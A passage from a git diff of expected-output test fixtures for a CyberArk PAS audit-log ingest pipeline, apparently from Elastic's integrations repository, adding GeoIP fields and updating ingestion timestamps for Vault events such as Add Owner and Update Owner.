Owner\",\"SourceUser\":\"Administrator\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -152,6 +170,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -197,7 +224,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101432600Z", + "ingested": "2021-12-14T14:42:22.112536874Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Batch\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -225,6 +252,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -270,7 +306,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101437900Z", + "ingested": "2021-12-14T14:42:22.112537260Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Operators\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -298,6 +334,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -343,7 +388,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101443300Z", + "ingested": "2021-12-14T14:42:22.112537668Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Backup Users\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -371,6 +416,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -416,7 +470,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101448700Z", + "ingested": "2021-12-14T14:42:22.112538066Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Auditors\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -444,6 +498,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -489,7 +552,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101454Z", + "ingested": "2021-12-14T14:42:22.112538454Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"DR Users\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -517,6 +580,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -562,7 +634,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101458100Z", + "ingested": "2021-12-14T14:42:22.112538842Z", "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Notification Engines\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -590,6 +662,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -635,7 +716,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101462400Z", + "ingested": "2021-12-14T14:42:22.112539226Z", "original": "\u003c5\u003e1 2021-03-10T09:11:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:22\",\"IsoTimestamp\":\"2021-03-10T09:11:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMPApp_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -663,6 +744,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -708,7 +798,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101467400Z", + "ingested": "2021-12-14T14:42:22.112539610Z", "original": "\u003c5\u003e1 2021-03-10T09:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:23\",\"IsoTimestamp\":\"2021-03-10T09:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -736,6 +826,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -781,7 +880,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101472Z", + "ingested": "2021-12-14T14:42:22.112539991Z", "original": "\u003c5\u003e1 2021-03-10T09:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:23\",\"IsoTimestamp\":\"2021-03-10T09:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Vault Admins\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -809,6 +908,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -854,7 +962,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101475500Z", + "ingested": "2021-12-14T14:42:22.112543409Z", "original": "\u003c5\u003e1 2021-03-10T09:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:23\",\"IsoTimestamp\":\"2021-03-10T09:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PVWAAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -882,6 +990,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -927,7 +1044,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101479900Z", + "ingested": "2021-12-14T14:42:22.112543883Z", "original": "\u003c5\u003e1 2021-03-10T09:11:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:36\",\"IsoTimestamp\":\"2021-03-10T09:11:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBUserProfile\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -955,6 +1072,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -1000,7 +1126,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101485300Z", + "ingested": "2021-12-14T14:42:22.112544276Z", "original": "\u003c5\u003e1 2021-03-10T09:11:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:37\",\"IsoTimestamp\":\"2021-03-10T09:11:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMP_ADB_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBridgeConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -1028,6 +1154,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -1073,7 +1208,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101490600Z", + "ingested": "2021-12-14T14:42:22.112544666Z", "original": "\u003c5\u003e1 2021-03-10T09:11:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:38\",\"IsoTimestamp\":\"2021-03-10T09:11:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBridgeCustom\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", @@ -1101,6 +1236,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -1146,7 +1290,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:55.101494300Z", + "ingested": "2021-12-14T14:42:22.112545063Z", "original": "\u003c5\u003e1 2021-03-10T17:59:32Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:32\",\"IsoTimestamp\":\"2021-03-10T17:59:32Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-326-cpm-auto-detection-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-326-cpm-auto-detection-start.log-expected.json index f340629aac8..4d286cf995b 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-326-cpm-auto-detection-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-326-cpm-auto-detection-start.log-expected.json @@ -59,7 +59,7 @@ "event": { "severity": 2, "action": "cpm auto-detection start", - "ingested": "2021-12-09T13:36:57.093060600Z", + "ingested": "2021-12-14T14:42:24.476645601Z", "original": "\u003c5\u003e1 2021-03-11T16:21:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:21:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:21:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e326\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Auto-detection Start\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Auto-detection Start\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePasswordManager_info\u003c/Safe\u003e\\n \u003cFile\u003e \u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e \u003c/Reason\u003e\\n \u003cExtraDetails\u003eADProcessID=2b2d3024-be5a-4b57-9f64-3813fb56e9b9;ADProcessName=LDAP Based Windows Local Administrator Account Provisioning;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Auto-detection Start\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:21:37\",\"IsoTimestamp\":\"2021-03-11T16:21:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"326\",\"Desc\":\"CPM Auto-detection Start\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Auto-detection Start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_info\",\"File\":\" \",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\" \",\"ExtraDetails\":\"ADProcessID=2b2d3024-be5a-4b57-9f64-3813fb56e9b9;ADProcessName=LDAP Based Windows Local Administrator Account Provisioning;\",\"Message\":\"CPM Auto-detection Start\",\"GatewayStation\":\"\"}}}", "code": "326", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-327-cpm-auto-detection-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-327-cpm-auto-detection-end.log-expected.json index 89ba47c48c9..7cdce0f5989 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-327-cpm-auto-detection-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-327-cpm-auto-detection-end.log-expected.json @@ -59,7 +59,7 @@ "event": { "severity": 2, "action": "cpm auto-detection end", - "ingested": "2021-12-09T13:36:57.215852200Z", + "ingested": "2021-12-14T14:42:24.600468735Z", "original": "\u003c5\u003e1 2021-03-11T16:21:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:21:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:21:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e327\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Auto-detection End\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Auto-detection End\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePasswordManager_info\u003c/Safe\u003e\\n \u003cFile\u003e \u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e \u003c/Reason\u003e\\n \u003cExtraDetails\u003eADProcessID=2b2d3024-be5a-4b57-9f64-3813fb56e9b9;ADProcessName=LDAP Based Windows Local Administrator Account Provisioning;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Auto-detection End\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:21:37\",\"IsoTimestamp\":\"2021-03-11T16:21:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"327\",\"Desc\":\"CPM Auto-detection End\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Auto-detection End\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_info\",\"File\":\" \",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\" \",\"ExtraDetails\":\"ADProcessID=2b2d3024-be5a-4b57-9f64-3813fb56e9b9;ADProcessName=LDAP Based Windows Local Administrator Account Provisioning;\",\"Message\":\"CPM Auto-detection End\",\"GatewayStation\":\"\"}}}", "code": "327", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log-expected.json index 62613abab1e..b728b99f3d9 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-33-update-owner.log-expected.json @@ -7,6 +7,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -52,7 +61,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:57.329023500Z", + "ingested": "2021-12-14T14:42:24.744164762Z", "original": "\u003c5\u003e1 2021-03-10T18:16:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:49\",\"IsoTimestamp\":\"2021-03-10T18:16:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PVWAAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", @@ -80,6 +89,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -125,7 +143,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:57.329031900Z", + "ingested": "2021-12-14T14:42:24.744169235Z", "original": "\u003c5\u003e1 2021-03-10T18:16:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:50\",\"IsoTimestamp\":\"2021-03-10T18:16:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PSMApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", @@ -153,6 +171,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -198,7 +225,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:57.329037500Z", + "ingested": "2021-12-14T14:42:24.744169913Z", "original": "\u003c5\u003e1 2021-03-10T18:16:51Z VAULT 